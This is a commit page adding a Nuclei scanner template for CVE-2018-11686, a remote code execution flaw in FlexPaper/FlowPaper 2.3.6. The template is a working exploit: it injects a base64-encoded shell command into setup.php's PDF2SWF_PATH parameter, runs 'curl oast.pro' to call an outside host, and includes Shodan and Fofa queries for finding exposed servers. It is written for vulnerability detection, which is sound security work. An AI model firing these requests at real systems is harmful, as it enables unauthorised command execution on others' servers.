Skip to content

Commit f6f306e

Browse files
Merge pull request #12448 from projectdiscovery/CVE-2018-11686
Create CVE-2018-11686.yaml
2 parents 9935dfa + 6959f08 commit f6f306e

1 file changed

Lines changed: 69 additions & 0 deletions

File tree

http/cves/2018/CVE-2018-11686.yaml

Lines changed: 69 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,69 @@
1+
id: CVE-2018-11686
2+
3+
info:
4+
name: FlexPaper/FlowPaper 2.3.6 - Remote Code Execution
5+
author: iamnoooob,pdresearch
6+
severity: critical
7+
description: |
8+
The Publish Service in FlexPaper (later renamed FlowPaper) 2.3.6 allows remote code execution via setup.php and change_config.php.
9+
reference:
10+
- https://nvd.nist.gov/vuln/detail/CVE-2018-11686
11+
classification:
12+
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
13+
cvss-score: 9.8
14+
cve-id: CVE-2018-11686
15+
cwe-id: CWE-20
16+
cpe: cpe:2.3:a:flowpaper:flowpaper:2.3.6:*:*:*:*:*:*:*
17+
metadata:
18+
verified: true
19+
max-request: 3
20+
vendor: flowpaper
21+
product: flowpaper
22+
shodan-query: title:"FlexPaper"
23+
fofa-query: title="FlexPaper"
24+
tags: cve,cve2018,flexpaper,flowpaper,rce,kev
25+
26+
variables:
27+
cmd: "curl oast.pro"
28+
cmd_b: "{{base64(cmd)}}"
29+
30+
http:
31+
- raw:
32+
- |
33+
POST /php/change_config.php HTTP/1.1
34+
Host: {{Hostname}}
35+
Content-Type: application/x-www-form-urlencoded
36+
37+
SAVE_CONFIG=1&SWF_Directory=config/
38+
39+
- |
40+
POST /php/change_config.php HTTP/1.1
41+
Host: {{Hostname}}
42+
Content-Type: application/x-www-form-urlencoded
43+
44+
SAVE_CONFIG=1&SWF_Directory=config/
45+
46+
matchers:
47+
- type: dsl
48+
dsl:
49+
- 'contains(header, "index.php?msg=Configuration%20saved!")'
50+
- 'status_code == 302 || status_code == 200'
51+
condition: and
52+
internal: true
53+
54+
- raw:
55+
- |
56+
GET /php/setup.php?step=4&PDF2SWF_PATH=echo+{{cmd_b}}+%7C+base64+-d+%7C+sh+%3Econfig/output.txt%3B HTTP/1.1
57+
Host: {{Hostname}}
58+
59+
- |
60+
GET /php/config/output.txt HTTP/1.1
61+
Host: {{Hostname}}
62+
63+
matchers:
64+
- type: dsl
65+
dsl:
66+
- 'contains(body_2, "Interactsh Server")'
67+
- 'contains(content_type_2, "text/plain")'
68+
- 'contains(location_1, "index.php")'
69+
condition: and

0 commit comments

Comments
 (0)